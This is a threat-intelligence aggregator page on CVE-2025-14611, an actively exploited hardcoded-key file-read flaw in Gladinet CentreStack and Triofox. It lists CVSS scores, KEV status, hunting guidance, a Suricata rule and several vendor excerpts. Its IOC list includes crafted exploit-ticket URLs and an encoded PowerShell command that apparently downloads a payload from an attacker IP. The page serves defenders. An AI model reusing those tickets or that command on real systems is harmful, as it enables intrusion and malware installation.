CVE-2025-14611
published 2025-12-12CVE-2025-14611: Gladinet CentreStack and Triofox prior to version 16.12.10420.56791 used hardcoded values for their implementation of the AES cryptoscheme. This degrades…
PriorityP196critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2026-01-05
Exploited in the wild
EPSS
50.95%
98.8th percentile
Gladinet CentreStack and Triofox prior to version 16.12.10420.56791 used hardcoded values for their implementation of the AES cryptoscheme. This degrades security for public exposed endpoints that may make use of it and may offer arbitrary local file inclusion when provided a specially crafted request without authentication. This opens the door for future exploitation and can be leveraged with previous vulnerabilities to gain a full system compromise.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| gladinet | centrestack | < 16.12.10420.56791 | 16.12.10420.56791 |
| gladinet | centrestack_and_triofox | < 16.12.10420.56791 | 16.12.10420.56791 |
| gladinet | triofox | < 16.12.10420.56791 | 16.12.10420.56791 |
Detection & IOCsextracted from sources · hover to see the quote
url/storage/filesvr.dn t=vghpI7EToZUDIZDdprSubL3mTZ2:aCLI:8Zra5AOPvX4TEEXlZiueqNysfRx7Dsd3P5l6eiYyDiG8Lvm0o41m:ZDplEYEsO5ksZajiXcsumkDyUgpV5VLxL%7C372varAu↗
url/storage/filesvr.dn t=vghpI7EToZUDIZDdprSubL3mTZ2:aCLI:8Zra5AOPvX4TEEXlZiueqNysfRx7Dsd3P5l6eiYyDiG8Lvm0o41m:ZDplEYEsO5ksZajiXcsukOQzFIwOzIHswJBdS7w0RY↗
url/storage/filesvr.dn t=t=vghpI7EToZUDIZDdprSubL3mTZ2:aCLI:8Zra5AOPvX4TEEXlZiueqNysfRx7Dsd3P5l6eiYyDiG8Lvm0o41m4mxEjYeJuI6Nk:xBHQQ1c6Hzjx3OsG4T044CP5qZ9Qr↗
command"C:\Windows\System32\cmd.exe" /c powershell -e SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcAA6AC8ALwAxADgANQAuADEAOQA2AC4AMQAxAC4AMgAwADcAOgA4ADAAMAAwAC8AYwBvAG4AcQB1AGUAcgBvAHIALgBlAHgAZQAgAC0ATwB1AHQARgBpAGwAZQAgAEMAOgBcAFUAcwBlAHIAcwBcAFAAdQBiAGwAaQBjAFwAYwBvAG4AcQB1AGUAcgBvAHIALgBlAHgAZQA=↗
yara↗
regex: 'decryptionKey="([A-Fa-f0-9]+)"'
- →Hunt for requests to /storage/filesvr.dn with a `t` query parameter in IIS logs — this is the vulnerable HTTP handler endpoint. Tickets with a timestamp of year 9999 indicate a crafted never-expiring exploit ticket. ↗
- →Look for Windows Application Event Log Event ID 1316 to identify ViewState deserialization exploitation attempts; the event captures the encoded payload and source IP. ↗
- →Audit file access logs for unauthorized reads of web.config, particularly at C:\Program Files (x86)\Gladinet Cloud Enterprise\root\web.config, which contains machine keys used for ViewState deserialization attacks. ↗
- →Review Access Tickets for year 9999 timestamps in the `t` parameter of filesvr.dn requests as a high-fidelity indicator of exploitation. ↗
- →The exploit ticket's `t` parameter uses URL-safe character substitution (`:` replaces `+`, `|` replaces `/`) before Base64 decoding — detection rules should account for this encoding when parsing IIS logs. ↗
- →Check for web.config exfiltration attempts and rotate all stored credentials and API keys if web.config access is confirmed. ↗
- ·The Username and Password fields in observed exploit tickets were left blank. When empty strings are passed, impersonation logic may fail and fall back to the IIS Application Pool Identity, meaning exploitation does not require valid credentials. ↗
- ·Attribution to the cl0p ransomware group for the December 15 incidents is unconfirmed at time of reporting; treat the associated IPs and conqueror.exe payload as high-confidence IOCs but actor attribution as tentative. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv4.07.1HIGHCVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:H/SI:H/SA:H/E:A/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vulncheck7.1HIGH
cisa7.1HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
Gladinet CentreStack and Triofox Hard Coded Cryptographic Vulnerability
cisa·2025-12-15·CVSS 7.1
CVE-2025-14611 [HIGH] CWE-798 Gladinet CentreStack and Triofox Hard Coded Cryptographic Vulnerability
Vulnerability: Gladinet CentreStack and Triofox Hard Coded Cryptographic Vulnerability
Affected: Gladinet CentreStack and Triofox
Gladinet CentreStack and TrioFox contain a hardcoded cryptographic keys vulnerability for their implementation of the AES cryptoscheme. This vulnerability degrades security for public exposed endpoints that may make use of it and may offer arbitrary local file inclusion when provided a specially crafted request without authentication.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: https://www.centrestack.com/p/gce_latest_release.html ; https://access.triofox.com/releases_history/; https://support.centrestack.com/hc/en-
GHSA
GHSA-j7r7-3wrm-f59w: Gladinet CentreStack and Triofox prior to version 16
ghsa_unreviewed·2025-12-12
CVE-2025-14611 [HIGH] CWE-798 GHSA-j7r7-3wrm-f59w: Gladinet CentreStack and Triofox prior to version 16
Gladinet CentreStack and Triofox prior to version 16.12.10420.56791 used hardcoded values for their implementation of the AES cryptoscheme. This degrades security for public exposed endpoints that may make use of it and may offer arbitrary local file inclusion when provided a specially crafted request without authentication. This opens the door for future exploitation and can be leveraged with previous vulnerabilities to gain a full system compromise.
VulnCheck
Gladinet CentreStack and Triofox Hard Coded Cryptographic Vulnerability
vulncheck·2025·CVSS 7.1
CVE-2025-14611 [HIGH] CWE-798 Gladinet CentreStack and Triofox Hard Coded Cryptographic Vulnerability
Gladinet CentreStack and Triofox Hard Coded Cryptographic Vulnerability
Gladinet CentreStack and TrioFox contain a hardcoded cryptographic keys vulnerability for their implementation of the AES cryptoscheme. This vulnerability degrades security for public exposed endpoints that may make use of it and may offer arbitrary local file inclusion when provided a specially crafted request without authentication.
Affected: Gladinet CentreStack and Triofox
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://www.huntress.com/blog/active-exploitation-gladinet-centrestack-triofox-insecure-cryptography-vulnerability; https://www.cisa.gov
Suricata
ET WEB_SPECIFIC_APPS Gladinet CentreStack/Triofox Hardcoded AES Key Arbitrary File Read (CVE-2025-14611)
suricata·2025-12-18·CVSS 7.1
CVE-2025-14611 [HIGH] ET WEB_SPECIFIC_APPS Gladinet CentreStack/Triofox Hardcoded AES Key Arbitrary File Read (CVE-2025-14611)
ET WEB_SPECIFIC_APPS Gladinet CentreStack/Triofox Hardcoded AES Key Arbitrary File Read (CVE-2025-14611)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Gladinet CentreStack/Triofox Hardcoded AES Key Arbitrary File Read (CVE-2025-14611)"; flow:established,to_server; http.uri; content:"/storage/filesvr.dn?"; content:"t|3d|vghpI7EToZUDIZDdprSubL3mTZ2|3a|aCLI|3a|8Zra5AOPvX4TEEXlZiueqNysfRx7Dsd3P5l6eiYyDiG8Lvm0o41m"; fast_pattern; pcre:"/^(?:\x7cGbA\x7cRIwrK0WT6jLb\x3aulpCaAEZ7n1cnc6XQR3EtoADI|\x3aZDplEYEsO5ksZajiXcsu(?:mkDyUgpV5VLxL\x7c372varAu|kOQzFIwOzIHswJBdS7w0RY))/R"; reference:url,www.huntress.com/blog/active-exploitation-gladinet-centrestack-triofox-insecure-cryptography-vulnerability; reference:cve,2025-14611; classtype:web-application-attack; sid:2066362; rev:1;
Nuclei
Gladinet CentreStack & Triofox - Hardcoded Credentials
nuclei·CVSS 7.1
CVE-2025-14611 [HIGH] Gladinet CentreStack & Triofox - Hardcoded Credentials
Gladinet CentreStack & Triofox - Hardcoded Credentials
Gladinet CentreStack and Triofox ","")'
- 'contains_any(header, "application/xml","text/xml","application/octet-stream")'
condition: and
extractors:
- type: regex
part: body
name: decryption_key
group: 1
regex:
- 'decryptionKey="([A-Fa-f0-9]+)"'
# digest: 4a0a0047304502203460345f0ae0faebf12e4e95a52625787b5de9a1b284ff55a0b0f2f8d0882a76022100cb98226fff7fcba505fec6b8521181ce320d0e87cdeb4b9a489e117417739947:922c64590222798bb761d5b6d8e72950
Rapid7
Weekly Metasploit Update: Apache ActiveMQ RCE, Gogs Rebase RCE, and Windows Kernel Pointer Enum
blogs_rapid7·2026-06-05·CVSS 8.8
CVE-2026-34197 [HIGH] Weekly Metasploit Update: Apache ActiveMQ RCE, Gogs Rebase RCE, and Windows Kernel Pointer Enum
## When Open Source is a bit too Open
Several fun modules landed this week, including an Apache RCE, Windows Kernel pointer collection, and Gogs RCE via naming. Leading off is Gogs' RCE that allows an attacker to execute commands by naming their branch --exec and requesting a rebase.
Another useful post module by CharlesQuinnDev enumerates the Kernel pointers leaked via the popular NtQuerySystemInformation technique. Those exposed pointers, combined with a good write primitive, make local privilege escalation easier to accomplish. Several local privilege escalations already use that technique, so exposing just that technique was a great call!
## New module content (3)
## Apache ActiveMQ RCE via Jolokia addNetworkConnector
Authors: dinosn and h00die
Type: Exploit
Pull request: #21497 c
Recorded Future
December 2025 CVE Landscape: 22 Critical Vulnerabilities Mark 120% Surge, React2Shell Dominates Threat Activity
blogs_recorded_future·2026-01-13·CVSS 10.0
CVE-2025-55182 [CRITICAL] December 2025 CVE Landscape: 22 Critical Vulnerabilities Mark 120% Surge, React2Shell Dominates Threat Activity
## December 2025 CVE Landscape: 22 Critical Vulnerabilities Mark 120% Surge, React2Shell Dominates Threat Activity
December 2025 witnessed a dramatic 120% increase in high-impact vulnerabilities, with Recorded Future's Insikt Group® identifying 22 vulnerabilities requiring immediate remediation, up from 10 in November. The month was dominated by widespread exploitation of Meta's React Server Components flaw.
What security teams need to know:
React2Shell pandemonium: CVE-2025-55182 triggered a global exploitation wave with multiple threat actors deploying diverse malware families
China-nexus exploitation intensifies: Earth Lamia, Jackpot Panda, and UAT-9686 leveraged critical flaws for espionage operations
Public exploits proliferate: Eleven of 22 vulnerabilities have proof-of-concept
Huntress
Active Exploitation of Gladinet CentreStack/Triofox Insecure Cryptography Vulnerability
blogs_huntress·2025-12-18
Active Exploitation of Gladinet CentreStack/Triofox Insecure Cryptography Vulnerability
Acknowledgments: Special thanks to John Hammond for his contributions to this investigation and writ e-up.
Update #2: 12/18/25 @ 6pm ET
We’ve seen reports from other intelligence firms that note that the cl0p ransomware group is targeting internet-facing Gladinet CentreStack servers. It is still early and we can’t fully confirm if this behavior definitively stems from cl0p. However, we continue to monitor for potential Gladinet exploitation. Most recently, we observed two new incidents on December 15.
Based on the available telemetry, both of these incidents involved suspected Gladinet CentreStack exploitation.
As seen in Figure 1 below, both incidents involved the same indicators involving a PowerShell command, which was executed via w3wp.exe :
"C:\Windows\System32\cmd.exe" /c powers
Huntress
Active Exploitation of Gladinet CentreStack/Triofox Insecure Cryptography Vulnerability | Huntress
blogs_huntress
Active Exploitation of Gladinet CentreStack/Triofox Insecure Cryptography Vulnerability | Huntress
Acknowledgments: Special thanks to John Hammond for his contributions to this investigation and write-up.
Update #2: 12/18/25 @ 6pm ET
We’ve seen reports from other intelligence firms that note that the cl0p ransomware group is targeting internet-facing Gladinet CentreStack servers. It is still early and we can’t fully confirm if this behavior definitively stems from cl0p. However, we continue to monitor for potential Gladinet exploitation. Most recently, we observed two new incidents on December 15.
Based on the available telemetry, both of these incidents involved suspected Gladinet CentreStack exploitation.
As seen in Figure 1 below, both incidents involved the same indicators involving a PowerShell command, which was executed via w3wp.exe:
"C:\Windows\System32\cmd.exe" /c powershe
Recorded Future
December 2025 CVE Landscape: 22 Critical Vulnerabilities Mark 120% Surge, React2Shell Dominates Threat Activity
blogs_recorded_future·CVSS 7.8
CVE-2025-55182 [HIGH] December 2025 CVE Landscape: 22 Critical Vulnerabilities Mark 120% Surge, React2Shell Dominates Threat Activity
# December 2025 CVE Landscape: 22 Critical Vulnerabilities Mark 120% Surge, React2Shell Dominates Threat Activity
December 2025 witnessed a dramatic 120% increase in high-impact vulnerabilities, with Recorded Future's Insikt Group® identifying 22 vulnerabilities requiring immediate remediation, up from 10 in November. The month was dominated by widespread exploitation of Meta's React Server Components flaw.
What security teams need to know:
- React2Shell pandemonium: CVE-2025-55182 triggered a global exploitation wave with multiple threat actors deploying diverse malware families
- China-nexus exploitation intensifies: Earth Lamia, Jackpot Panda, and UAT-9686 leveraged critical flaws for espionage operations
- Public exploits proliferate: Eleven of 22 vulnerabilities have proof-of-conce
Wiz
CVE-2025-14611 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.2
CVE-2025-14611 [HIGH] CVE-2025-14611 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-14611 :
Gladinet CentreStack vulnerability analysis and mitigation
Gladinet CentreStack and Triofox prior to version 16.12.10420.56791 used hardcoded values for their implementation of the AES cryptoscheme. This degrades security for public exposed endpoints that may make use of it and may offer arbitrary local file inclusion when provided a specially crafted request without authentication. This opens the door for future exploitation and can be leveraged with previous vulnerabilities to gain a full system compromise.
Source : NVD
## 7.1
Score
Published December 12, 2025
Severity HIGH
CNA Score 7.1
Affected Technologies
Gladinet CentreStack
Has Public Exploit Yes
Has CISA KEV Exploit Yes
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Pe
2025-12-12
Published
2025-12-15
Added to CISA KEV
Exploited in the wild